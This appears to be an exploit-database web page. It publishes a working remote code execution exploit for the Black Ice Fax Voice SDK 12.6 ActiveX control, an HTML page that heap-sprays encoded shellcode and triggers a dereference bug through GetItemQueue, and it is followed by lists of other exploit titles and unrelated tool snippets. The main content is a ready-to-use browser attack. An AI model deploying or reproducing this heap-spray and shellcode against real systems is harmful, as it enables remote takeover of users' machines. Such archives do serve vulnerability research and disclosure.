Menu

Search for hundreds of thousands of exploits

"Black Ice Fax Voice SDK 12.6 - Remote Code Execution"

Author

Exploit author

mr_me

Platform

Exploit platform

windows

Release date

Exploit published date

2011-06-20

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
<html>
<!--
Black Ice Fax Voice SDK v12.6 - integer dereference code execution exploit
Date: Jun 20, 2011
Link: http://www.blackice.com/Fax%20C++%20ActiveX.htm
Version: 12.6
Tested on: WinXP - IE 6 & 7
 
Class FAX
GUID: {2E980303-C865-11CF-BA24-444553540000}
Number of Interfaces: 1
Default Interface: _DFAX
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False

Meh, despite the above, i found this bug slightly amusing >:) 

Theres an integer overflow in this section of fax.ocx which is how i found the dereference vulnerability.

1000CFA3	MOV ECX,[EBP+8]		< --- get our variable into ECX
1000CFA6	MOV EDX,[ECX]	  	< --- dereference
1000CFA8	MOV ECX,[EBP+8]		< --- get our variable into ECX again (meh)
1000CFAB	CALL [EDX+14]		< --- !!!!

and...

EIP 1000CFA6 -> 51EC8B55
EAX 1000CF82 -> 51EC8B55
EBX 0013EC68 -> 01D29E90
ECX FFFFFFFF
EDX 73F360D3 -> EB0C4589
EDI 0013EB98 -> 73F4D682
ESI 00000000
EBP 0013EB94 -> 0013EC10
ESP 0013EB90 -> 0003A1A0

vulnerable methods:
GetFirstItem()
GetItemQueue()

prob more.
-->

<object classid='clsid:2E980303-C865-11CF-BA24-444553540000' id='target'/></object>
<script language='javascript'>
// Calc.exe
var shellcode = unescape(
    '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
    '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
    '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
    '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
    '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
    '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
    '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
    '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'
);
 
var nops = unescape('%u0a0a%u0a0a');
var headersize = 20;
var slackspace = headersize + shellcode.length;
while(nops.length < slackspace) {
    nops += nops;
}
var fillblock = nops.substring(0, slackspace);
var block = nops.substring(0, nops.length - slackspace);
while((block.length + slackspace) < 0x50000) {
    block = block + block + fillblock;
}
memory=new Array();
for(counter=0; counter<200; counter++){
    memory[counter] = block + shellcode;
}
var boom = 168430090; // 0x0a0a0a0a
target.GetItemQueue(boom);
</script>
</html>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2020-02-06 "Cisco Data Center Network Manager 11.2.1 - 'LanFabricImpl' Command Injection" webapps java mr_me
2020-02-06 "Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection" webapps java mr_me
2020-02-06 "Cisco Data Center Network Manager 11.2 - Remote Code Execution" webapps java mr_me
2019-12-12 "ManageEngine Desktop Central - 'FileStorage getChartImage' Deserialization / Unauthenticated Remote Code Execution" webapps multiple mr_me
2019-05-17 "Cisco Prime Infrastructure Health Monitor HA TarArchive - Directory Traversal / Remote Code Execution" remote linux mr_me
2018-08-20 "Easylogin Pro 1.3.0 - 'Encryptor.php' Unserialize Remote Code Execution" remote php mr_me
2018-06-25 "Foxit Reader 9.0.1.1049 - Remote Code Execution" remote windows mr_me
2018-01-28 "Trend Micro Threat Discovery Appliance 2.6.1062r1 - 'dlp_policy_upload.cgi' Remote Code Execution" remote linux mr_me
2018-01-15 "Synology Photo Station 6.8.2-3461 - 'SYNOPHOTO_Flickr_MultiUpload' Race Condition File Write Remote Code Execution" remote hardware mr_me
2018-01-03 "Kingsoft Antivirus/Internet Security 9+ - Local Privilege Escalation" local windows mr_me
2017-10-30 "Oracle Java SE - Web Start jnlp XML External Entity Processing Information Disclosure" webapps xml mr_me
2017-09-12 "Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (2)" local windows mr_me
2017-09-06 "Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (1)" local windows mr_me
2017-09-06 "Jungo DriverWizard WinDriver < 12.4.0 - Kernel Out-of-Bounds Write Privilege Escalation" local windows mr_me
2017-07-05 "Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution" remote php mr_me
2016-05-09 "Dell SonicWALL Scrutinizer 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution" remote windows mr_me
2016-03-28 "Cogent Datahub 7.3.9 Gamma Script - Local Privilege Escalation" local windows mr_me
2016-03-07 "ATutor LMS - '/install_modules.php' Cross-Site Request Forgery / Remote Code Execution" webapps php mr_me
2012-06-15 "Useresponse 1.0.2 - Privilege Escalation / Remote Code Execution" webapps php mr_me
2012-06-14 "XM Easy Personal FTP Server 5.30 - Remote Format String Write4" remote windows mr_me
2011-12-23 "Open Conference/Journal/Harvester Systems 2.3.x - Multiple Remote Code Execution Vulnerabilities" webapps php mr_me
2011-12-09 "Docebo Lms 4.0.4 - 'Messages' Remote Code Execution" webapps php mr_me
2011-12-04 "Family Connections CMS 2.5.0/2.7.1 - 'less.php' Remote Command Execution" webapps php mr_me
2011-09-22 "Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow" remote windows mr_me
2011-09-12 "ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Local Buffer Overflow" local windows mr_me
2011-07-31 "Actfax FTP Server 4.27 - 'USER' Stack Buffer Overflow (Metasploit)" remote windows mr_me
2011-06-20 "Black Ice Fax Voice SDK 12.6 - Remote Code Execution" remote windows mr_me
2011-06-20 "Black Ice Cover Page SDK - Insecure Method 'DownloadImageFileURL()' (Metasploit)" remote windows mr_me
2011-03-11 "Linux NTP query client 4.2.6p1 - Heap Overflow" dos linux mr_me
2011-03-09 "Maian Weblog 4.0 - Blind SQL Injection" webapps php mr_me 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected